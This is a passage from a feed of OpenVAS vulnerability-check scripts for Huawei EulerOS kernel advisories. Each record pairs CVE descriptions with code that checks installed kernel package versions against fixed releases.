Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1253\");\n script_version(\"2020-01-23T11:36:28+0000\");\n script_cve_id(\"CVE-2017-18360\", \"CVE-2018-18281\", \"CVE-2018-18559\", \"CVE-2018-19824\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:36:28 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:36:28 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1253)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-2\\.5\\.4\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1253\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1253\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-1253 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A division-by-zero in set_termios(), when debugging is enabled, was found in the Linux kernel. When the [io_ti] driver is loaded, a local unprivileged attacker can request incorrect high transfer speed in the change_port_settings() in the drivers/usb/serial/io_ti.c so that the divisor value becomes zero and causes a system crash resulting in a denial of service.CVE-2017-18360\n\nA flaw was found In the Linux kernel, through version 4.19.6, where a local user could exploit a use-after-free in the ALSA driver by supplying a malicious USB Sound device (with zero interfaces) that is mishandled in usb_audio_probe in sound/usb/card.c. An attacker could corrupt memory and possibly escalate privileges if the attacker is able to have physical access to the system.CVE-2018-19824\n\nSince Linux kernel version 3.2, the mremap() syscall performs TLB flushes after dropping pagetable locks. If a syscall such as ftruncate() removes entries from the pagetables of a task that is in the middle of mremap(), a stale TLB entry can remain for a short time that permits access to a physical page after it has been released back to the page allocator and reused.CVE-2018-18281\n\nA use-after-free flaw can occur in the Linux kernel due to a race condition between packet_do_bind() and packet_notifier() functions called for an AF_PACKET socket. An unprivileged, local user could use this flaw to induce kernel memory corruption on the system, leading to an unresponsive system or to a crash. Due to the nature of the flaw, privilege escalation cannot be fully ruled out.CVE-2018-18559\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS Virtualization 2.5.4.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-2.5.4\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~862.14.1.1_62\", rls:\"EULEROSVIRT-2.5.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~862.14.1.1_62\", rls:\"EULEROSVIRT-2.5.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~862.14.1.1_62\", rls:\"EULEROSVIRT-2.5.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~862.14.1.1_62\", rls:\"EULEROSVIRT-2.5.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~862.14.1.1_62\", rls:\"EULEROSVIRT-2.5.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~3.10.0~862.14.1.1_62\", rls:\"EULEROSVIRT-2.5.4\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:36:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-19824", "CVE-2016-10741", "CVE-2018-18281", "CVE-2018-18559", "CVE-2017-18360"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191244", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191244", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1244)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1244\");\n script_version(\"2020-01-23T11:36:13+0000\");\n script_cve_id(\"CVE-2016-10741\", \"CVE-2017-18360\", \"CVE-2018-18281\", \"CVE-2018-18559\", \"CVE-2018-19824\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:36:13 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:36:13 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1244)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-2\\.5\\.3\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1244\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1244\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-1244 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A flaw was found In the Linux kernel, through version 4.19.6, where a local user could exploit a use-after-free in the ALSA driver by supplying a malicious USB Sound device (with zero interfaces) that is mishandled in usb_audio_probe in sound/usb/card.c. An attacker could corrupt memory and possibly escalate privileges if the attacker is able to have physical access to the system.CVE-2018-19824\n\nIt was found that the Linux kernel can hit a BUG_ON() statement in the __xfs_get_blocks() in the fs/xfs/xfs_aops.c because of a race condition between direct and memory-mapped I/O associated with a hole in a file that is handled with BUG_ON() instead of an I/O failure. This allows a local unprivileged attacker to cause a system crash and a denial of service.CVE-2016-10741\n\nA division-by-zero in set_termios(), when debugging is enabled, was found in the Linux kernel. When the [io_ti] driver is loaded, a local unprivileged attacker can request incorrect high transfer speed in the change_port_settings() in the drivers/usb/serial/io_ti.c so that the divisor value becomes zero and causes a system crash resulting in a denial of service.CVE-2017-18360\n\nSince Linux kernel version 3.2, the mremap() syscall performs TLB flushes after dropping pagetable locks. If a syscall such as ftruncate() removes entries from the pagetables of a task that is in the middle of mremap(), a stale TLB entry can remain for a short time that permits access to a physical page after it has been released back to the page allocator and reused.CVE-2018-18281\n\nA use-after-free flaw can occur in the Linux kernel due to a race condition between packet_do_bind() and packet_notifier() functions called for an AF_PACKET socket. An unprivileged, local user could use this flaw to induce kernel memory corruption on the system, leading to an unresponsive system or to a crash. Due to the nature of the flaw, privilege escalation cannot be fully ruled out.CVE-2018-18559\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS Virtualization 2.5.3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-2.5.3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~514.44.5.10_132\", rls:\"EULEROSVIRT-2.5.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~514.44.5.10_132\", rls:\"EULEROSVIRT-2.5.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~514.44.5.10_132\", rls:\"EULEROSVIRT-2.5.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~514.44.5.10_132\", rls:\"EULEROSVIRT-2.5.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~514.44.5.10_132\", rls:\"EULEROSVIRT-2.5.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~3.10.0~514.44.5.10_132\", rls:\"EULEROSVIRT-2.5.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-05T16:39:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3122", "CVE-2013-4345", "CVE-2014-0155", "CVE-2015-4176", "CVE-2015-3332", "CVE-2018-11232", "CVE-2018-10675", "CVE-2014-4014", "CVE-2016-2184", "CVE-2018-18710", "CVE-2017-18218", "CVE-2017-14340", "CVE-2016-2545", "CVE-2013-7421", "CVE-2017-5669", "CVE-2017-18360", "CVE-2016-2546", "CVE-2017-16531", "CVE-2018-7480", "CVE-2013-2889"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-02-05T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191471", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191471", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1471)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1471\");\n script_version(\"2020-02-05T08:56:28+0000\");\n script_cve_id(\"CVE-2013-2889\", \"CVE-2013-4345\", \"CVE-2013-7421\", \"CVE-2014-0155\", \"CVE-2014-3122\", \"CVE-2014-4014\", \"CVE-2015-3332\", \"CVE-2015-4176\", \"CVE-2016-2184\", \"CVE-2016-2545\", \"CVE-2016-2546\", \"CVE-2017-14340\", \"CVE-2017-16531\", \"CVE-2017-18218\", \"CVE-2017-18360\", \"CVE-2017-5669\", \"CVE-2018-10675\", \"CVE-2018-11232\", \"CVE-2018-18710\", \"CVE-2018-7480\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-02-05 08:56:28 +0000 (Wed, 05 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:48:49 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1471)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1471\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1471\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-1471 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"drivers/hid/hid-zpff.c in the Human Interface Device (HID) subsystem in the Linux kernel through 3.11, when CONFIG_HID_ZEROPLUS is enabled, allows physically proximate attackers to cause a denial of service (heap-based out-of-bounds write) via a crafted device.(CVE-2013-2889)\n\nThe capabilities implementation in the Linux kernel before 3.14.8 does not properly consider that namespaces are inapplicable to inodes, which allows local users to bypass intended chmod restrictions by first creating a user namespace, as demonstrated by setting the setgid bit on a file with group ownership of root.(CVE-2014-4014)\n\nThe function drivers/usb/core/config.c in the Linux kernel, allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device, related to the USB_DT_INTERFACE_ASSOCIATION descriptor.(CVE-2017-16531)\n\nThe snd_timer_interrupt function in sound/core/timer.c in the Linux kernel before 4.4.1 does not properly maintain a certain linked list, which allows local users to cause a denial of service (race condition and system crash) via a crafted ioctl call.(CVE-2016-2545)\n\nA flaw was found in the Linux kernel where the deletion of a file or directory could trigger an unmount and reveal data under a mount point. This flaw was inadvertently introduced with the new feature of being able to lazily unmount a mount tree when using file system user namespaces.(CVE-2015-4176)\n\nThe do_shmat function in ipc/shm.c in the Linux kernel, through 4.9.12, does not restrict the address calculated by a certain rounding operation. This allows privileged local users to map page zero and, consequently, bypass a protection mechanism that exists for the mmap system call. This is possible by making crafted shmget and shmat system calls in a privileged context.(CVE-2017-5669)\n\nIn drivers/net/ethernet/hisilicon/hns/hns_enet.c in the Linux kernel, before 4.13, local users can cause a denial of service (use-after-free and BUG) or possibly have unspecified other impact by leveraging differences in skb handling between hns_nic_net_xmit_hw and hns_nic_net_xmit.(CVE-2017-18218)\n\nThe ioapic_deliver function in virt/kvm/ioapic.c in the Linux kernel through 3.14.1 does not properly validate the kvm_irq_delivery_to_apic return value, which allows guest OS users to cause a denial of service (host OS crash) via a crafted entry in the redirection table of an I/O APIC. NOTE: the affected code was moved to the ioapic_service function before the vulnerability was announced.(CVE-2014-0155)\n\nA flaw was found in the way the Linux kernel's Cr ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:41:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10878", "CVE-2018-10881", "CVE-2018-18281", "CVE-2017-18360", "CVE-2018-20169"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191108", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191108", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1108)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1108\");\n script_version(\"2020-01-23T15:42:05+0000\");\n script_cve_id(\"CVE-2017-18360\", \"CVE-2018-10878\", \"CVE-2018-10881\", \"CVE-2018-18281\", \"CVE-2018-20169\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 15:42:05 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:31:33 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1108)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP3\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1108\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1108\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-1108 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A flaw was discovered in the Linux kernel's USB subsystem in the __usb_get_extra_descriptor() function in the drivers/usb/core/usb.c which mishandles a size check during the reading of an extra descriptor data. By using a specially crafted USB device which sends a forged extra descriptor, an unprivileged user with physical access to the system can potentially cause a privilege escalation or trigger a system crash or lock up and thus to cause a denial of service (DoS).(CVE-2018-20169)\n\nSince Linux kernel version 3.2, the mremap() syscall performs TLB flushes after dropping pagetable locks. If a syscall such as ftruncate() removes entries from the pagetables of a task that is in the middle of mremap(), a stale TLB entry can remain for a short time that permits access to a physical page after it has been released back to the page allocator and reused.(CVE-2018-18281)\n\nA division-by-zero in set_termios(), when debugging is enabled, was found in the Linux kernel. When the [io_ti] driver is loaded, a local unprivileged attacker can request incorrect high transfer speed in the change_port_settings() in the drivers/usb/serial/io_ti.c so that the divisor value becomes zero and causes a system crash resulting in a denial of service. (CVE-2017-18360)\n\nA flaw was found in the Linux kernel's ext4 filesystem. A local user can cause an out-of-bound access in ext4_get_group_info function, a denial of service, and a system crash by mounting and operating on a crafted ext4 filesystem image.(CVE-2018-10881)\n\nA flaw was found in the Linux kernel's ext4 filesystem. A local user can cause an out-of-bounds write and a denial of service or unspecified other impact is possible by mounting and operating a crafted ext4 filesystem image.(CVE-2018-10878)\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS V2.0SP3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~514.44.5.10.h165\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~514.44.5.10.h165\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~514.44.5.10.h165\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~514.44.5.10.h165\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~514.44.5.10.h165\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~514.44.5.10.h165\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~514.44.5.10.h165\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~514.44.5.10.h165\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~514.44.5.10.h165\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:36:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10741", "CVE-2018-18281", "CVE-2018-18559", "CVE-2018-10883", "CVE-2019-3701", "CVE-2017-18360", "CVE-2018-20169", "CVE-2018-10902", "CVE-2018-1094", "CVE-2018-10879"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191131", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191131", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1131)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1131\");\n script_version(\"2020-01-23T11:32:22+0000\");\n script_cve_id(\"CVE-2016-10741\", \"CVE-2017-18360\", \"CVE-2018-10879\", \"CVE-2018-10883\", \"CVE-2018-10902\", \"CVE-2018-1094\", \"CVE-2018-18281\", \"CVE-2018-18559\", \"CVE-2018-20169\", \"CVE-2019-3701\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:32:22 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:32:22 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1131)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1131\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1131\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-1131 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A division-by-zero in set_termios(), when debugging is enabled, was found in the Linux kernel. When the [io_ti] driver is loaded, a local unprivileged attacker can request incorrect high transfer speed in the change_port_settings() in the drivers/usb/serial/io_ti.c so that the divisor value becomes zero and causes a system crash resulting in a denial of service. (CVE-2017-18360)\n\nSince Linux kernel version 3.2, the mremap() syscall performs TLB flushes after dropping pagetable locks. If a syscall such as ftruncate() removes entries from the pagetables of a task that is in the middle of mremap(), a stale TLB entry can remain for a short time that permits access to a physical page after it has been released back to the page allocator and reused.(CVE-2018-18281)\n\nA flaw was discovered in the Linux kernel's USB subsystem in the __usb_get_extra_descriptor() function in the drivers/usb/core/usb.c which mishandles a size check during the reading of an extra descriptor data. By using a specially crafted USB device which sends a forged extra descriptor, an unprivileged user with physical access to the system can potentially cause a privilege escalation or trigger a system crash or lock up and thus to cause a denial of service (DoS).(CVE-2018-20169)\n\nIt was found that the Linux kernel can hit a BUG_ON() statement in the 